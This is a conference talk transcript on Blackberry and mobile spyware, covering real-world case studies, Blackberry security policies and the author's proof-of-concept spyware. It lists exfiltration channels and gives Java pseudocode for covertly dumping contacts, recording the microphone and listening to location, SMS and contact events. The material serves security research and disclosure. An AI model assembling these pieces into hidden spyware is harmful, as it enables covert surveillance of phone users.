Shmoocon 2010 - The Monkey Steals the BerriesShmoocon 2010 - The Monkey Steals the Berries
Shmoocon 2010 - The Monkey Steals the Berries
 
Anti-Debugging - A Developers View
Anti-Debugging - A Developers ViewAnti-Debugging - A Developers View
Anti-Debugging - A Developers View
 
Google application engine
Google application engineGoogle application engine
Google application engine
 

Similar to IT Hot Topics 2010 - The Coming Wave of Smartphone Attacks

Comilion introduction presentation 26102012 (1)
Comilion introduction presentation 26102012 (1)Comilion introduction presentation 26102012 (1)
Comilion introduction presentation 26102012 (1)AP DealFlow
 
India now the largest mobile advertising market in Asia Pacific
India now the largest mobile advertising market in Asia PacificIndia now the largest mobile advertising market in Asia Pacific
India now the largest mobile advertising market in Asia PacificInMobi
 
中国アプリ市場とその周辺
中国アプリ市場とその周辺中国アプリ市場とその周辺
中国アプリ市場とその周辺良太郎 小原
 
How mobile-ready are corporate websites?
How mobile-ready are corporate websites?How mobile-ready are corporate websites?
How mobile-ready are corporate websites?Web Managers Group
 
Quantacast Mobile Web trends report 2009
Quantacast Mobile Web trends report 2009Quantacast Mobile Web trends report 2009
Quantacast Mobile Web trends report 2009guestd94b193
 
Where 2.0 — Native vs Web vs Hybrid: Mobile Development Choices
Where 2.0 — Native vs Web vs Hybrid: Mobile Development ChoicesWhere 2.0 — Native vs Web vs Hybrid: Mobile Development Choices
Where 2.0 — Native vs Web vs Hybrid: Mobile Development ChoicesJason Grigsby
 
DSS ITSEC Conference 2012 - MobileIron MDM, MAM & Mobile Security
DSS ITSEC Conference 2012 - MobileIron MDM, MAM & Mobile SecurityDSS ITSEC Conference 2012 - MobileIron MDM, MAM & Mobile Security
DSS ITSEC Conference 2012 - MobileIron MDM, MAM & Mobile SecurityAndris Soroka
 
Enterprise Mobility Computerworld Mar 2012
Enterprise Mobility Computerworld Mar 2012Enterprise Mobility Computerworld Mar 2012
Enterprise Mobility Computerworld Mar 2012Exicon
 
Android and its apps market overview
Android and its apps market overviewAndroid and its apps market overview
Android and its apps market overview01Booster
 
Numbers - Analytics Driving Economy
Numbers - Analytics Driving EconomyNumbers - Analytics Driving Economy
Numbers - Analytics Driving EconomyVishal Gurbuxani
 
AdMob 2010 mart istatistikleri
AdMob 2010 mart istatistikleriAdMob 2010 mart istatistikleri
AdMob 2010 mart istatistikleriErol Dizdar
 
Ad mob 2010 mart istatistikleri-
Ad mob 2010 mart istatistikleri-Ad mob 2010 mart istatistikleri-
Ad mob 2010 mart istatistikleri-Erol Dizdar
 
Ad mob mobile-metrics-mar-10
Ad mob mobile-metrics-mar-10Ad mob mobile-metrics-mar-10
Ad mob mobile-metrics-mar-10Erol Dizdar
 
Smart Pad In 10 months
Smart Pad In 10 monthsSmart Pad In 10 months
Smart Pad In 10 monthsSeungyul Kim
 
The Mobile Landscape in France and Europe
The Mobile Landscape in France and EuropeThe Mobile Landscape in France and Europe
The Mobile Landscape in France and Europeservicesmobiles.fr
 

Similar to IT Hot Topics 2010 - The Coming Wave of Smartphone Attacks (20)

Comilion introduction presentation 26102012 (1)
Comilion introduction presentation 26102012 (1)Comilion introduction presentation 26102012 (1)
Comilion introduction presentation 26102012 (1)
 
India now the largest mobile advertising market in Asia Pacific
India now the largest mobile advertising market in Asia PacificIndia now the largest mobile advertising market in Asia Pacific
India now the largest mobile advertising market in Asia Pacific
 
中国アプリ市場とその周辺
中国アプリ市場とその周辺中国アプリ市場とその周辺
中国アプリ市場とその周辺
 
5 mobile trends (2009)
5 mobile trends (2009)5 mobile trends (2009)
5 mobile trends (2009)
 
How mobile-ready are corporate websites?
How mobile-ready are corporate websites?How mobile-ready are corporate websites?
How mobile-ready are corporate websites?
 
Quantacast Mobile Web trends report 2009
Quantacast Mobile Web trends report 2009Quantacast Mobile Web trends report 2009
Quantacast Mobile Web trends report 2009
 
Where 2.0 — Native vs Web vs Hybrid: Mobile Development Choices
Where 2.0 — Native vs Web vs Hybrid: Mobile Development ChoicesWhere 2.0 — Native vs Web vs Hybrid: Mobile Development Choices
Where 2.0 — Native vs Web vs Hybrid: Mobile Development Choices
 
DSS ITSEC Conference 2012 - MobileIron MDM, MAM & Mobile Security
DSS ITSEC Conference 2012 - MobileIron MDM, MAM & Mobile SecurityDSS ITSEC Conference 2012 - MobileIron MDM, MAM & Mobile Security
DSS ITSEC Conference 2012 - MobileIron MDM, MAM & Mobile Security
 
Enterprise Mobility Computerworld Mar 2012
Enterprise Mobility Computerworld Mar 2012Enterprise Mobility Computerworld Mar 2012
Enterprise Mobility Computerworld Mar 2012
 
Hk enterprise mobility computerworld mar 2012
Hk enterprise mobility computerworld mar 2012Hk enterprise mobility computerworld mar 2012
Hk enterprise mobility computerworld mar 2012
 
Android and its apps market overview
Android and its apps market overviewAndroid and its apps market overview
Android and its apps market overview
 
Numbers - Analytics Driving Economy
Numbers - Analytics Driving EconomyNumbers - Analytics Driving Economy
Numbers - Analytics Driving Economy
 
AdMob 2010 mart istatistikleri
AdMob 2010 mart istatistikleriAdMob 2010 mart istatistikleri
AdMob 2010 mart istatistikleri
 
Ad mob 2010 mart istatistikleri-
Ad mob 2010 mart istatistikleri-Ad mob 2010 mart istatistikleri-
Ad mob 2010 mart istatistikleri-
 
Ad mob mobile-metrics-mar-10
Ad mob mobile-metrics-mar-10Ad mob mobile-metrics-mar-10
Ad mob mobile-metrics-mar-10
 
Seventynine.mobi
Seventynine.mobiSeventynine.mobi
Seventynine.mobi
 
Introduction session
Introduction sessionIntroduction session
Introduction session
 
Smart Pad In 10 months
Smart Pad In 10 monthsSmart Pad In 10 months
Smart Pad In 10 months
 
The Mobile Landscape in France and Europe
The Mobile Landscape in France and EuropeThe Mobile Landscape in France and Europe
The Mobile Landscape in France and Europe
 
Mobclix Sfmobile
Mobclix SfmobileMobclix Sfmobile
Mobclix Sfmobile
 

More from Tyler Shields

The New Mobile Landscape - OWASP Ireland
The New Mobile Landscape - OWASP IrelandThe New Mobile Landscape - OWASP Ireland
The New Mobile Landscape - OWASP IrelandTyler Shields
 
Avoiding the Pandora Pitfall
Avoiding the Pandora PitfallAvoiding the Pandora Pitfall
Avoiding the Pandora PitfallTyler Shields
 
Survey of Rootkit Technologies and Their Impact on Digital Forensics
Survey of Rootkit Technologies and Their Impact on Digital ForensicsSurvey of Rootkit Technologies and Their Impact on Digital Forensics
Survey of Rootkit Technologies and Their Impact on Digital ForensicsTyler Shields
 
Static Detection of Application Backdoors
Static Detection of Application BackdoorsStatic Detection of Application Backdoors
Static Detection of Application BackdoorsTyler Shields
 
Blackhat Europe 2009 - Detecting Certified Pre Owned Software
Blackhat Europe 2009 - Detecting Certified Pre Owned SoftwareBlackhat Europe 2009 - Detecting Certified Pre Owned Software
Blackhat Europe 2009 - Detecting Certified Pre Owned SoftwareTyler Shields
 
Owasp Ireland - The State of Software Security
Owasp  Ireland - The State of Software SecurityOwasp  Ireland - The State of Software Security
Owasp Ireland - The State of Software SecurityTyler Shields
 
More Apps More Problems
More Apps More ProblemsMore Apps More Problems
More Apps More ProblemsTyler Shields
 
CarolinaCon 2005 Web Application Hacking 101
CarolinaCon 2005 Web Application Hacking 101CarolinaCon 2005 Web Application Hacking 101
CarolinaCon 2005 Web Application Hacking 101Tyler Shields
 

More from Tyler Shields (8)

The New Mobile Landscape - OWASP Ireland
The New Mobile Landscape - OWASP IrelandThe New Mobile Landscape - OWASP Ireland
The New Mobile Landscape - OWASP Ireland
 
Avoiding the Pandora Pitfall
Avoiding the Pandora PitfallAvoiding the Pandora Pitfall
Avoiding the Pandora Pitfall
 
Survey of Rootkit Technologies and Their Impact on Digital Forensics
Survey of Rootkit Technologies and Their Impact on Digital ForensicsSurvey of Rootkit Technologies and Their Impact on Digital Forensics
Survey of Rootkit Technologies and Their Impact on Digital Forensics
 
Static Detection of Application Backdoors
Static Detection of Application BackdoorsStatic Detection of Application Backdoors
Static Detection of Application Backdoors
 
Blackhat Europe 2009 - Detecting Certified Pre Owned Software
Blackhat Europe 2009 - Detecting Certified Pre Owned SoftwareBlackhat Europe 2009 - Detecting Certified Pre Owned Software
Blackhat Europe 2009 - Detecting Certified Pre Owned Software
 
Owasp Ireland - The State of Software Security
Owasp  Ireland - The State of Software SecurityOwasp  Ireland - The State of Software Security
Owasp Ireland - The State of Software Security
 
More Apps More Problems
More Apps More ProblemsMore Apps More Problems
More Apps More Problems
 
CarolinaCon 2005 Web Application Hacking 101
CarolinaCon 2005 Web Application Hacking 101CarolinaCon 2005 Web Application Hacking 101
CarolinaCon 2005 Web Application Hacking 101
 

Recently uploaded

Secure your environment with UiPath and CyberArk technologies - Session 1
Secure your environment with UiPath and CyberArk technologies - Session 1Secure your environment with UiPath and CyberArk technologies - Session 1
Secure your environment with UiPath and CyberArk technologies - Session 1DianaGray10
 
Machine Learning Model Validation (Aijun Zhang 2024).pdf
Machine Learning Model Validation (Aijun Zhang 2024).pdfMachine Learning Model Validation (Aijun Zhang 2024).pdf
Machine Learning Model Validation (Aijun Zhang 2024).pdfAijun Zhang
 
UiPath Platform: The Backend Engine Powering Your Automation - Session 1
UiPath Platform: The Backend Engine Powering Your Automation - Session 1UiPath Platform: The Backend Engine Powering Your Automation - Session 1
UiPath Platform: The Backend Engine Powering Your Automation - Session 1DianaGray10
 
IaC & GitOps in a Nutshell - a FridayInANuthshell Episode.pdf
IaC & GitOps in a Nutshell - a FridayInANuthshell Episode.pdfIaC & GitOps in a Nutshell - a FridayInANuthshell Episode.pdf
IaC & GitOps in a Nutshell - a FridayInANuthshell Episode.pdfDaniel Santiago Silva Capera
 
Basic Building Blocks of Internet of Things.
Basic Building Blocks of Internet of Things.Basic Building Blocks of Internet of Things.
Basic Building Blocks of Internet of Things.YounusS2
 
Introduction to Matsuo Laboratory (ENG).pptx
Introduction to Matsuo Laboratory (ENG).pptxIntroduction to Matsuo Laboratory (ENG).pptx
Introduction to Matsuo Laboratory (ENG).pptxMatsuo Lab
 
Bird eye's view on Camunda open source ecosystem
Bird eye's view on Camunda open source ecosystemBird eye's view on Camunda open source ecosystem
Bird eye's view on Camunda open source ecosystemAsko Soukka
 
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdf
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdfUiPath Solutions Management Preview - Northern CA Chapter - March 22.pdf
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdfDianaGray10
 
Cybersecurity Workshop #1.pptx
Cybersecurity Workshop #1.pptxCybersecurity Workshop #1.pptx
Cybersecurity Workshop #1.pptxGDSC PJATK
 
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019IES VE
 
UiPath Studio Web workshop series - Day 8
UiPath Studio Web workshop series - Day 8UiPath Studio Web workshop series - Day 8
UiPath Studio Web workshop series - Day 8DianaGray10
 
Meet the new FSP 3000 M-Flex800™
Meet the new FSP 3000 M-Flex800™Meet the new FSP 3000 M-Flex800™
Meet the new FSP 3000 M-Flex800™Adtran
 
AI You Can Trust - Ensuring Success with Data Integrity Webinar
AI You Can Trust - Ensuring Success with Data Integrity WebinarAI You Can Trust - Ensuring Success with Data Integrity Webinar
AI You Can Trust - Ensuring Success with Data Integrity WebinarPrecisely
 
COMPUTER 10 Lesson 8 - Building a Website
COMPUTER 10 Lesson 8 - Building a WebsiteCOMPUTER 10 Lesson 8 - Building a Website
COMPUTER 10 Lesson 8 - Building a Websitedgelyza
 
Linked Data in Production: Moving Beyond Ontologies
Linked Data in Production: Moving Beyond OntologiesLinked Data in Production: Moving Beyond Ontologies
Linked Data in Production: Moving Beyond OntologiesDavid Newbury
 
Comparing Sidecar-less Service Mesh from Cilium and Istio
Comparing Sidecar-less Service Mesh from Cilium and IstioComparing Sidecar-less Service Mesh from Cilium and Istio
Comparing Sidecar-less Service Mesh from Cilium and IstioChristian Posta
 
Artificial Intelligence & SEO Trends for 2024
Artificial Intelligence & SEO Trends for 2024Artificial Intelligence & SEO Trends for 2024
Artificial Intelligence & SEO Trends for 2024D Cloud Solutions
 
Designing A Time bound resource download URL
Designing A Time bound resource download URLDesigning A Time bound resource download URL
Designing A Time bound resource download URLRuncy Oommen
 
Connector Corner: Extending LLM automation use cases with UiPath GenAI connec...
Connector Corner: Extending LLM automation use cases with UiPath GenAI connec...Connector Corner: Extending LLM automation use cases with UiPath GenAI connec...
Connector Corner: Extending LLM automation use cases with UiPath GenAI connec...DianaGray10
 

Recently uploaded (20)

Secure your environment with UiPath and CyberArk technologies - Session 1
Secure your environment with UiPath and CyberArk technologies - Session 1Secure your environment with UiPath and CyberArk technologies - Session 1
Secure your environment with UiPath and CyberArk technologies - Session 1
 
Machine Learning Model Validation (Aijun Zhang 2024).pdf
Machine Learning Model Validation (Aijun Zhang 2024).pdfMachine Learning Model Validation (Aijun Zhang 2024).pdf
Machine Learning Model Validation (Aijun Zhang 2024).pdf
 
UiPath Platform: The Backend Engine Powering Your Automation - Session 1
UiPath Platform: The Backend Engine Powering Your Automation - Session 1UiPath Platform: The Backend Engine Powering Your Automation - Session 1
UiPath Platform: The Backend Engine Powering Your Automation - Session 1
 
IaC & GitOps in a Nutshell - a FridayInANuthshell Episode.pdf
IaC & GitOps in a Nutshell - a FridayInANuthshell Episode.pdfIaC & GitOps in a Nutshell - a FridayInANuthshell Episode.pdf
IaC & GitOps in a Nutshell - a FridayInANuthshell Episode.pdf
 
Basic Building Blocks of Internet of Things.
Basic Building Blocks of Internet of Things.Basic Building Blocks of Internet of Things.
Basic Building Blocks of Internet of Things.
 
Introduction to Matsuo Laboratory (ENG).pptx
Introduction to Matsuo Laboratory (ENG).pptxIntroduction to Matsuo Laboratory (ENG).pptx
Introduction to Matsuo Laboratory (ENG).pptx
 
Bird eye's view on Camunda open source ecosystem
Bird eye's view on Camunda open source ecosystemBird eye's view on Camunda open source ecosystem
Bird eye's view on Camunda open source ecosystem
 
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdf
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdfUiPath Solutions Management Preview - Northern CA Chapter - March 22.pdf
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdf
 
Cybersecurity Workshop #1.pptx
Cybersecurity Workshop #1.pptxCybersecurity Workshop #1.pptx
Cybersecurity Workshop #1.pptx
 
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019
 
UiPath Studio Web workshop series - Day 8
UiPath Studio Web workshop series - Day 8UiPath Studio Web workshop series - Day 8
UiPath Studio Web workshop series - Day 8
 
Meet the new FSP 3000 M-Flex800™
Meet the new FSP 3000 M-Flex800™Meet the new FSP 3000 M-Flex800™
Meet the new FSP 3000 M-Flex800™
 
AI You Can Trust - Ensuring Success with Data Integrity Webinar
AI You Can Trust - Ensuring Success with Data Integrity WebinarAI You Can Trust - Ensuring Success with Data Integrity Webinar
AI You Can Trust - Ensuring Success with Data Integrity Webinar
 
COMPUTER 10 Lesson 8 - Building a Website
COMPUTER 10 Lesson 8 - Building a WebsiteCOMPUTER 10 Lesson 8 - Building a Website
COMPUTER 10 Lesson 8 - Building a Website
 
20230104 - machine vision
20230104 - machine vision20230104 - machine vision
20230104 - machine vision
 
Linked Data in Production: Moving Beyond Ontologies
Linked Data in Production: Moving Beyond OntologiesLinked Data in Production: Moving Beyond Ontologies
Linked Data in Production: Moving Beyond Ontologies
 
Comparing Sidecar-less Service Mesh from Cilium and Istio
Comparing Sidecar-less Service Mesh from Cilium and IstioComparing Sidecar-less Service Mesh from Cilium and Istio
Comparing Sidecar-less Service Mesh from Cilium and Istio
 
Artificial Intelligence & SEO Trends for 2024
Artificial Intelligence & SEO Trends for 2024Artificial Intelligence & SEO Trends for 2024
Artificial Intelligence & SEO Trends for 2024
 
Designing A Time bound resource download URL
Designing A Time bound resource download URLDesigning A Time bound resource download URL
Designing A Time bound resource download URL
 
Connector Corner: Extending LLM automation use cases with UiPath GenAI connec...
Connector Corner: Extending LLM automation use cases with UiPath GenAI connec...Connector Corner: Extending LLM automation use cases with UiPath GenAI connec...
Connector Corner: Extending LLM automation use cases with UiPath GenAI connec...
 

IT Hot Topics 2010 - The Coming Wave of Smartphone Attacks

  • 1. The Coming Wave of Smartphone Attacks An Analysis of Blackberry and Other Mobile Device Spyware The Monkey Steals The Berries
  • 2. Outline  Background  Case Studies of Mobile Spyware  Blackberry Security Mechanisms  Installation Methods  Effects and Behaviors  Technical Specifications  Methods of Detection and Future Work  Demonstration © 2010 Veracode, Inc. 2
  • 3. Presenter Background Currently Sr. Security Researcher, Veracode, Inc. Previously Security Consultant - Symantec Security Consultant - @Stake Incident Response and Forensics Handler – US Government Wishes He Was Infinitely Rich Personal Trainer to hot Hollywood starlets © 2010 Veracode, Inc. 3
  • 4. Mobile Spyware  Often includes modifications to legitimate programs designed to compromise the device or device data  Often inserted by those who have legitimate access to source code or distribution binaries  May be intentional or inadvertent  Not specific to any particular programming language  Not specific to any particular mobile Operating System © 2010 Veracode, Inc. 4
  • 5. Attacker Motivation  Practical method of compromise for many systems – Let the users install your backdoor on systems you have no access to – Looks like legitimate software so may bypass mobile AV  Retrieve and manipulate valuable private data – Looks like legitimate application traffic so little risk of detection  For high value targets such as financial services and government it becomes cost effective and more reliable – High-end attackers will not be content to exploit opportunistic vulnerabilities, which might be fixed and therefore unavailable at a critical juncture. They may seek to implant vulnerability for later exploitation – Think “Aurora” for Mobile Devices © 2010 Veracode, Inc. 5
  • 6. Why is Mobile The Future of Spyware © 2010 Veracode, Inc. 6
  • 7. Units Sold By Operating System 90,000.00 80,879 80,000.00 72,934 70,000.00 60,000.00 Units Sold 50,000.00 40,000.00 34,347 2008 Units 2009 Units 30,000.00 24,890 23,149 20,000.00 16,498 11,418 10,622 10,000.00 15,028 6,798 1,193 4,027 8,127 641 0 1,112 0.00 Symbian Research In iPhone OS Microsoft Linux Android WebOS Other OSs Motion Windows Mobile Data Source: DISTMO Appstore Analytics Operating System www.appstore.info © 2010 Veracode, Inc. 7
  • 8. Units Sold Market Growth 8% 6% 6% Percentage Growth in Market Share 4% 3% 3% 2% 0% 0% Symbian Research In iPhone OS Microsoft Linux Android WebOS Other OSs 0% Motion Windows Mobile -2% -2% -3% -3% -4% -6% -6% Operating System Data Source: DISTMO Appstore Analytics www.appstore.info © 2010 Veracode, Inc. 8
  • 9. Application Counts 160,000 150,998 140,000 120,000 Number Of Applications In Store Last Counted Jan/Feb 2010 100,000 80,000 60,000 40,000 19,897 20,000 6118 5291 1452 944 0 iPhone App Store Android Nokia Ovi Store Blackberry App Palm App Catalog Windows Marketplace (Maemo) World Marketplace Data Source: DISTMO Appstore Analytics Marketplace Name www.appstore.info © 2010 Veracode, Inc. 9
  • 10. iPhone Applications Sold 3.00 Applications Sold (In Billions) 2.50 2.00 1.50 1.00 0.50 0.00 Data Source: Gartner, Inc., a research and advisory firm © 2010 Veracode, Inc. 10
  • 11. Back To The Future © 2010 Veracode, Inc. 11
  • 12. Back To The Future © 2010 Veracode, Inc. 12
  • 13. Case Studies of Mobile Spyware © 2010 Veracode, Inc. 13
  • 14. FlexiSpy  http://www.flexispy.com  $149 - $350 PER YEAR depending on features  Features – Remote Listening – C&C Over SMS – SMS and Email Logging – Call History Logging – Location Tracking – Call Interception – GPS Tracking – Symbian, Blackberry, Windows Mobile Supported © 2010 Veracode, Inc. 14
  • 15. FlexiSpy Web Site Quotes  “Download FlexiSPY spyphone software directly onto a mobile phone and receive copies of SMS, Call Logs, Emails, Locations and listen to conversations within minutes of purchase. “  “Catch cheating wives or cheating husbands, stop employee espionage, protect children, make automatic backups, bug meetings rooms etc.”  “F Secure seem to think that its ok for them to interfere with legitimate, legal and accountable software. Who appointed them judge, jury and executioner anyway, and why wont they answer our emails, so we have to ask who is the real malware? Here is how to remove FSecure malware from your device. Please don't believe the fsecure fear mongers who simply wish you to buy their products.” © 2010 Veracode, Inc. 15
  • 16. Mobile Spy  http://www.mobile-spy.com  $49.97 PER QUARTER or $99.97 PER YEAR  Features – SMS Logging – Call Logging – GPS Logging – Web URL Logging – BlackBerry, iPhone (Jailbroken Only), Android, Windows Mobile or Symbian © 2010 Veracode, Inc. 16
  • 17. Mobile Spy Web Site Quotes  “This high-tech spy software will allow you to see exactly what they do while you are away. Are your kids texting while driving or using the phone in all hours of the night? Are your employees sending company secrets? Do they erase their phone logs?”  “Our software is not for use on a phone you do not own or have proper permission to monitor from the user or owner. You must always follow all applicable laws and regulations in your region.”  “Purchased by more than 30,000 customers in over 150 countries” © 2010 Veracode, Inc. 17
  • 18. Etisalat (SS8)  Cell carrier in United Arab Emirates (UAE)  Pushed via SMS as “software patch” for Blackberry smartphones  Upgrade urged to “enhance performance” of Blackberry service  Blackberry PIN messaging as C&C  Sets FLAG_HIDDEN bit to true  Interception of outbound email / SMS only  Discovered due to flooded listener server cause retries that drained batteries of affected devices  Accidentally released the .jar as well as the .cod (ooopsie?!) © 2010 Veracode, Inc. 18
  • 19. Bugs & Phonesnoop  Bugs – Exfiltration of inbound and outbound email – Hidden  PhoneSnoop – Remotely turn on a Blackberry phone microphone – Listen in on target ambient conversation © 2010 Veracode, Inc. 19
  • 20. Storm8 Phone Number Farming – iMobsters and Vampires Live (and others) – “Storm8 has written the software for all its games in such a way that it automatically accesses, collects, and transmits the wireless telephone number of each iPhone user who downloads any Storm8 game," the suit alleges. " ... Storm8, though, has no reason whatsoever to access the wireless phone numbers of the iPhones on which its games are installed." – “Storm8 says that this code was used in development tests, only inadvertently remained in production builds, and removed as soon as it was alerted to the issue.” – These were available via the iTunes App Store! – http://www.boingboing.net/2009/11/05/iphone-game-dev-accu.html © 2010 Veracode, Inc. 20
  • 21. Symbian Sexy Space – Poses as legitimate server ACSServer.exe – Calls itself 'Sexy Space„ – Steals phone and network information – Exfiltrates data via hacker owned web site connection – Can SPAM contact list members – Basically a “botnet” for mobile phones – Signing process  Anti-virus scan using F-Secure - Approx 43% proactive detection rate (PCWorld)  Random selection of inbound manually assessed – Symbian signed this binary as safe! – http://news.zdnet.co.uk/security/0,1000000189,39684313,00.htm © 2010 Veracode, Inc. 21
  • 22. Symbian MergoSMS – The worm spreads as self-signed (untrusted) SIS installers – Installer contains sub-SIS installers some of them signed by Symbian. – Spreads by sending text messages  Contain variable messages in Chinese and a link to a website  Going to link results in worm download – On phone reboot malware runs, downloads worm payload, completing infection – The worm was spread on Chinese file sharing web sites – Originally spread as games, themes, etc. for Symbian Series60 3rd & 5th edition phones. – http://www.f-secure.com/v-descs/trojan_symbos_merogosms.shtml © 2010 Veracode, Inc. 22
  • 23. 09Droid – Banking Applications Attack – Droid app that masquerades as any number of different target banking applications – Target banks included  Royal Bank of Canada  Chase  BB&T  SunTrust  Over 50 total financial institutions were affected – May steal and exfiltrate banking credentials – Approved and downloaded from Google’s Android Marketplace! – http://www.theinquirer.net/inquirer/news/1585716/fraud-hits-android-apps- market – http://www.pcadvisor.co.uk/news/index.cfm?RSS&NewsID=3209953 – http://www.f-secure.com/weblog/archives/00001852.html © 2010 Veracode, Inc. 23
  • 24. Blackberry Security Mechanisms © 2010 Veracode, Inc. 24
  • 25. Blackberry Takes Security Seriously  KB05499: Protecting the BlackBerry smartphone and BlackBerry Enterprise Server against malware http://www.blackberry.com/btsc/search.do?cmd=displayKC&docTyp e=kc&externalId=KB05499  Protecting the BlackBerry device platform against malware http://docs.blackberry.com/en/admin/deliverables/1835/Protecting the BlackBerry device platform against malware.pdf  Placing the BlackBerry Enterprise Solution in a segmented network http://docs.blackberry.com/en/admin/deliverables/1460/Placing_the_ BlackBerry_Enterprise_Solution_in_a_Segmented_Network.pdf  BlackBerry Enterprise Server Policy Reference Guide http://docs.blackberry.com/en/admin/deliverables/7228/Policy_Refer ence_Guide.pdf © 2010 Veracode, Inc. 25
  • 26. Does It Really Matter?! Only 23% of smartphone owners use the security software installed on the devices. (Source: Trend Micro Inc. survey of 1,016 U.S. smartphone users, June 2009) 13% of organizations currently protect from mobile viruses (Mobile Security 2009 Survey by Goode Intelligence) © 2010 Veracode, Inc. 26
  • 27. Code Signing  Subset of Blackberry API considered “controlled”  Use of controlled package, class, or method requires appropriate code signature  Blackberry Signature Tool comes with the Blackberry JDE  Acquire signing keys by filling out a web form and paying $20 – This not is a high barrier to entry – 48 hours later you receive signing keys  Install keys into signature tool © 2010 Veracode, Inc. 27
  • 28. Code Signing Process  Hash of code sent to RIM for API tracking purposes only  RIM does not get source code  COD file is signed based on required keys  Application ready to be deployed  Easy to acquire anonymous keys © 2010 Veracode, Inc. 28
  • 29. IT Policies  Requires connection to Blackberry Enterprise Server (BES)  Supersedes lower levels of security restrictions  Prevent devices from downloading third-party applications over wireless  Prevent installation of specific third-party applications  Control permissions of third party applications – Allow Internal Connections – Allow Third-Party Apps to Use Serial Port – Allow External Connections  MOSTLY “Default Allow All” policy for BES and non-BES devices © 2010 Veracode, Inc. 29
  • 30. Application Policies  Can be controlled at the BES  If no BES present, controls are set on the handheld itself  Can only be MORE restrictive than the IT policy, never less  Control individual resource access per application  Control individual connection access per application  MOSTLY “Default Allow All” policy for BES and non-BES devices © 2010 Veracode, Inc. 30
  • 31. V4.7.0.148 Default 3rd Party Application Permissions Bluetooth Phone USB Connections Location Data Connections Connections Internet IPC Device Settings Application Media Themes Input Simulation Management Security Timer Browser Filtering Recording Reset Email Data Organizer Data Files Security Data © 2010 Veracode, Inc. 31
  • 32. V5.0.0.328 Default 3rd Party Application Permissions Bluetooth Phone USB Connections Location Data Connections Connections Server Network Internet IPC Device Settings Application Media Themes Input Simulation Management Security Timer Display Information Browser Filtering Recording Reset While Locked Email Data Organizer Data Files Security Data © 2010 Veracode, Inc. 32
  • 33. V5.0.0.328 Trusted 3rd Party Application Permissions Bluetooth Phone USB Connections Location Data Connections Connections Server Network Internet IPC Device Settings Application Media Themes Input Simulation Management Security Timer Display Information Browser Filtering Recording Reset While Locked Email Data Organizer Data Files Security Data © 2010 Veracode, Inc. 33
  • 34. Installation Methods © 2010 Veracode, Inc. 34
  • 35. Installation Methods  Accessing a web site using the BlackBerry Browser and choosing to download the application over the network (OTA Installation)  Running the application loader tool of the BlackBerry Desktop Manager and choosing to download the application onto the BlackBerry device using a physical connection to the computer  Blackberry BES push the application to your user community  Get it into the Blackberry App World and let the user choose to install it for you! © 2010 Veracode, Inc. 35
  • 36. Installation Files  .COD files: A COD file is a proprietary file format developed by RIM that contains compiled and packaged application code.  .JAD files: An application descriptor that stores information about the application itself and the location of .COD files  .JAR files: a JAR file (or Java ARchive) is used for aggregating many files into one. It is generally used to distribute Java classes and associated metadata.  .ALX files: Similar to the .JAD file, in that it holds information about where the installation files for the application are located © 2010 Veracode, Inc. 36
  • 37. txsBBSpy Effects and Behaviors © 2010 Veracode, Inc. 37
  • 38. txsBBSpy Logging and Dumping Monitor connected / disconnected calls Monitor PIM added / removed / updated Monitor inbound SMS Monitor outbound SMS Real Time track GPS coordinates Dump all contacts Dump current location Dump phone logs Dump email Dump microphone capture (security prompted) © 2010 Veracode, Inc. 38
  • 39. txsBBSpy Exfiltration and C&C Methods SMS (No CDMA) SMS Datagrams (Supports CDMA) Email HTTP GET HTTP POST TCP Socket UDP Socket DNS Exfiltration Default command and control to inbound SMS TXSPROTO Bidirectional TCP based command and control © 2010 Veracode, Inc. 39
  • 40. txsBBSpy Technical Specifications © 2010 Veracode, Inc. 40
  • 41. Technical Methods  Data Dumpers  Listeners  Exfiltration Methods  Command and Control © 2010 Veracode, Inc. 41
  • 42. Dump Contact Information  API – javax.microedition.pim – net.rim.blackberry.API.pdap  Pseudocode PIM pim = PIM.getInstance(); BlackBerryPIMList contacts = (BlackBerryPIMList) pim.openPIMList(PIM.CONTACT_LIST, PIM.READ_ONLY); Enumeration eContacts = contacts.items(); Contact contact = (Contact) eContacts.nextElement(); if (contacts.isSupportedField(Contact.EMAIL)) { if (contact.countValues(Contact.EMAIL) > 0) email = contact.getString(Contact.EMAIL, 0); } © 2010 Veracode, Inc. 42
  • 43. Dump Microphone  API – javax.microedition.media.control – javax.microedition.media.manager – javax.microedition.media.player  Pseudocode Player p = Manager.createPlayer("capture://audio"); RecordControl rc = (RecordControl)p.getControl("RecordControl"); ByteArrayOutputStream os = new ByteArrayOutputStream(); rc.setRecordStream(os); rc.startRecord(); © 2010 Veracode, Inc. 43
  • 44. Location Listener  Create the class that implements LocationListener Interface  Get LocationProvider instance  Add LocationListener  API – javax.microedition.location.LocationProvider.getInstance – javax.microedition.location.LocationProvider.setLocationListener  Pseudocode ll = new LocListener(); lp = LocationProvider.getInstance(null); lp.setLocationListener(ll, 1, 1, 1); © 2010 Veracode, Inc. 47
  • 45. SMS Outbound Listener  Create class that implements “SendListener” interface  Add the SendListener  API – net.rim.blackberry.api.sms.SMS – javax.wireless.messaging.TextMessage  Pseudocode sl = new SMSOUTListener(); SMS.addSendListener(sl); © 2010 Veracode, Inc. 48
  • 46. PIM Listener  Create the class that implements PIMListListener Interface  Open Target PIMList and Add PIMListListener  API – javax.microedition.pim.PIM.getInstance() – net.rim.blackberry.api.pdap.BlackBerryPIMList.addListener  Pseudocode pl = new PhoneLogger(); pim = PIM.getInstance(); contacts = (BlackBerryPIMList) pim.openPIMList(PIM.CONTACT_LIST, PIM.READ_ONLY); contacts.addListener(piml); © 2010 Veracode, Inc. 51
